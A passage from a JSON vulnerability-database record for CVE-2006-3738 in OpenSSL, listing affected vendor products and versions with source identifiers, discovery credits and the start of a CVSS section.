            "vendor": "turbolinux",
            "version": "2.0"
          },
          {
            "model": "ciscosecure acs appliance",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1111"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.5.3"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "5.0.193"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.6(1)"
          },
          {
            "model": "filezilla",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.15"
          },
          {
            "model": "hardware management console for iseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.2"
          },
          {
            "model": "security mars",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.2.2"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4480"
          },
          {
            "model": "call manager sr1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "10.0"
          },
          {
            "model": "unified presence server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "1.0"
          },
          {
            "model": "predictive dialing system",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "11.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.4"
          },
          {
            "model": "project openssl l",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.1"
          },
          {
            "model": "hardware management console for pseries r4.0",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.6.4"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.6"
          },
          {
            "model": "linux lts sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "ipcop",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ipcop",
            "version": "1.4.13"
          },
          {
            "model": "insight management agents for tru64 unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "3.5.2"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.1"
          },
          {
            "model": "call manager es33",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.1"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.2.3"
          },
          {
            "model": "s8300 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.0"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "http server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "oracle",
            "version": "9.0.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "networks ip address domain manager",
            "scope": null,
            "trust": 0.3,
            "vendor": "nortel",
            "version": null
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.5"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.8"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.0"
          },
          {
            "model": "f...",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.3"
          },
          {
            "model": "-prerelease",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "freebsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.0"
          },
          {
            "model": "beta11",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0"
          },
          {
            "model": "grid engine 32-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "mds 9216i",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux ws ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "enterprise linux as",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6.3"
          },
          {
            "model": "hardware management console for pseries r3.6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3.0"
          },
          {
            "model": "s8710 r2.0.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "openpkg",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openpkg",
            "version": "2.3"
          },
          {
            "model": "stonebeat fullcluster for raptor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "hp-ux b.11.00",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "filezilla",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "2.2.28"
          },
          {
            "model": "hp-ux b.11.31",
            "scope": null,
            "trust": 0.3,
            "vendor": "hp",
            "version": null
          },
          {
            "model": "novell linux desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "1.0"
          },
          {
            "model": "linux personal x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "project openssl e",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.9"
          },
          {
            "model": "hardware management console for pseries r3.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0.8"
          },
          {
            "model": "computing snapgear sg710",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.3"
          },
          {
            "model": "call manager es62",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0"
          },
          {
            "model": "project openssl",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "solaris 9 sparc",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.1"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3.132"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.2"
          },
          {
            "model": "css11500 content services switch s",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "7.10"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.2.1"
          },
          {
            "model": "groupware server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "kolab",
            "version": "2.0.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "90002.0(0.86)"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "255"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "css11500 content services switch",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "8.10.2.65"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.4"
          },
          {
            "model": "linux s/390",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "sip proxy server",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.5"
          },
          {
            "model": "openvms secure web server",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.2"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "enterprise linux as ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "server b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.8"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.5.1"
          },
          {
            "model": "linux enterprise server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "suse",
            "version": "10"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.1.3"
          },
          {
            "model": "secure acs for unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.3.6.1"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "275"
          },
          {
            "model": "linux amd64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "slackware",
            "version": "10.0"
          },
          {
            "model": "-release",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "6.0"
          },
          {
            "model": "stonebeat webcluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.0"
          },
          {
            "model": "linux lts powerpc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "6.06"
          },
          {
            "model": "grid engine update3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "s8500",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "0"
          },
          {
            "model": "secure acs solution engine",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3.2"
          },
          {
            "model": "project openssl beta3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux i386",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ubuntu",
            "version": "5.10"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.2"
          },
          {
            "model": "secure acs for windows nt",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "3.3"
          },
          {
            "model": "esx server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "vmware",
            "version": "2.0.2"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.639"
          },
          {
            "model": "workcentre pro",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "245"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.5"
          },
          {
            "model": "openvpn",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.9"
          },
          {
            "model": "firewall",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.2"
          },
          {
            "model": "linux m68k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4.0"
          },
          {
            "model": "networks meridian option 11c",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1-0"
          },
          {
            "model": "linux sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.1.0.4"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(2)"
          },
          {
            "model": "linux hppa",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.0.1"
          },
          {
            "model": "messaging storage server mm3.0",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "grid engine 64-bit sparc",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "5.3"
          },
          {
            "model": "enterprise linux ws",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "s8500 cm",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "avaya",
            "version": "3.1"
          },
          {
            "model": "s8710 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0.1"
          },
          {
            "model": "advanced workstation for the itanium processor ia64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "hat red hat network satellite server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "red",
            "version": "4.2"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1700"
          },
          {
            "model": "netbsd",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "netbsd",
            "version": "3.1"
          },
          {
            "model": "application \u0026 content networking software",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "enterprise linux es",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3"
          },
          {
            "model": "openvpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openvpn",
            "version": "2.0.7"
          },
          {
            "model": "grid engine update4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.4"
          },
          {
            "model": "ons mspp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "5.4-stable",
            "scope": null,
            "trust": 0.3,
            "vendor": "freebsd",
            "version": null
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.3.30"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "project openssl d",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.8"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0.3.728"
          },
          {
            "model": "call manager",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.3(1)"
          },
          {
            "model": "linux -current",
            "scope": null,
            "trust": 0.3,
            "vendor": "slackware",
            "version": null
          },
          {
            "model": "grid engine update6",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "sun",
            "version": "6.0"
          },
          {
            "model": "ciscoworks common management foundation",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "2.1"
          },
          {
            "model": "linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "home",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "stonebeat fullcluster for firewall-1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154543.3"
          },
          {
            "model": "ciscosecure acs for windows and unix",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "hardware management console for iseries r2.1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "4.0"
          },
          {
            "model": "tru64 b-4",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.4.1"
          },
          {
            "model": "stonebeat fullcluster for isa server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "3.0"
          },
          {
            "model": "message networking",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5"
          },
          {
            "model": "call manager es55",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "ons 15454sdh",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.0(0)"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0"
          },
          {
            "model": "css11500 content services switch",
            "scope": null,
            "trust": 0.3,
            "vendor": "cisco",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.5"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "8.0"
          },
          {
            "model": "server 0.9.4e",
            "scope": null,
            "trust": 0.3,
            "vendor": "filezilla",
            "version": null
          },
          {
            "model": "tru64 b-3",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "5.1"
          },
          {
            "model": "linux",
            "scope": null,
            "trust": 0.3,
            "vendor": "gentoo",
            "version": null
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "3.0"
          },
          {
            "model": "linux alpha",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "security agent",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.5.1.657"
          },
          {
            "model": "secure enterprise linux",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "trustix",
            "version": "2.0"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.3.1"
          },
          {
            "model": "desktop",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "project openssl k",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "advanced workstation for the itanium processor",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "2.1"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "265"
          },
          {
            "model": "call manager es24",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "4.1"
          },
          {
            "model": "hardware management console for pseries",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ibm",
            "version": "3"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.2.1"
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.3.2"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": "10.0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.3"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44910"
          },
          {
            "model": "s8300 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear u2",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "secure",
            "version": "3.1.4"
          },
          {
            "model": "novell linux pos",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9"
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154542.3(5)"
          },
          {
            "model": "ftp server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "serv u",
            "version": "6.01"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "4.5.1"
          },
          {
            "model": "project openssl beta1",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "-releng",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "freebsd",
            "version": "5.3"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.9.6"
          },
          {
            "model": "server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "filezilla",
            "version": "0.8.5"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.0.2"
          },
          {
            "model": "mds",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "9000"
          },
          {
            "model": "download accelarator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "prozilla",
            "version": "1.3.2"
          },
          {
            "model": "solaris 10 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "siparator",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2"
          },
          {
            "model": "s8700 r2.0.1",
            "scope": null,
            "trust": 0.3,
            "vendor": "avaya",
            "version": null
          },
          {
            "model": "computing snapgear sg580",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "secure",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.4"
          },
          {
            "model": "system management homepage",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.8"
          },
          {
            "model": "networks vpn router",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "1100"
          },
          {
            "model": "stonebeat securitycluster",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.5"
          },
          {
            "model": "ons 15454e optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "openvms secure web server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "1.1-1"
          },
          {
            "model": "application control engine module",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "0"
          },
          {
            "model": "system management homepage",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "hp",
            "version": "2.1.1"
          },
          {
            "model": "linux ia-32",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "debian",
            "version": "3.1"
          },
          {
            "model": "firewall",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "ingate",
            "version": "3.2.1"
          },
          {
            "model": "solaris 9 x86",
            "scope": null,
            "trust": 0.3,
            "vendor": "sun",
            "version": null
          },
          {
            "model": "project openssl m",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "gss global site selector",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "44920"
          },
          {
            "model": "stonegate high availability firewall and vpn",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "stonesoft",
            "version": "2.6"
          },
          {
            "model": "project openssl l",
            "scope": "ne",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.7"
          },
          {
            "model": "linux professional",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "9.2"
          },
          {
            "model": "network satellite (for rhel",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "redhat",
            "version": "4)4.2"
          },
          {
            "model": "suse linux openexchange server",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "s u s e",
            "version": "4.0"
          },
          {
            "model": "workcentre",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "xerox",
            "version": "238"
          },
          {
            "model": "project openssl b",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.2"
          },
          {
            "model": "linux mandrake x86 64",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "mandrakesoft",
            "version": "2007.0"
          },
          {
            "model": "ons mstp",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154540"
          },
          {
            "model": "networks wlan access point",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "nortel",
            "version": "7250.0"
          },
          {
            "model": "project openssl j",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "openssl",
            "version": "0.9.6"
          },
          {
            "model": "multimedia",
            "scope": null,
            "trust": 0.3,
            "vendor": "turbolinux",
            "version": null
          },
          {
            "model": "ons optical transport platform",
            "scope": "eq",
            "trust": 0.3,
            "vendor": "cisco",
            "version": "154544.0(2)"
          }
        ],
        "sources": [
          {
            "db": "CERT/CC",
            "id": "VU#386964"
          },
          {
            "db": "CERT/CC",
            "id": "VU#845620"
          },
          {
            "db": "CERT/CC",
            "id": "VU#547300"
          },
          {
            "db": "BID",
            "id": "20249"
          },
          {
            "db": "NVD",
            "id": "CVE-2006-3738"
          }
        ]
      },
      "credits": {
        "@context": {
          "@vocab": "https://www.variotdbs.pl/ref/credits#",
          "sources": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/sources#"
            }
          }
        },
        "data": "The vendor credits Tavis Ormandy and Will Drewry of the Google Security Team with the discovery of this vulnerability.",
        "sources": [
          {
            "db": "BID",
            "id": "20249"
          }
        ],
        "trust": 0.3
      },
      "cve": "CVE-2006-3738",
      "cvss": {
        "@context": {
          "cvssV2": {
            "@container": "@list",
            "@context": {
              "@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
            },
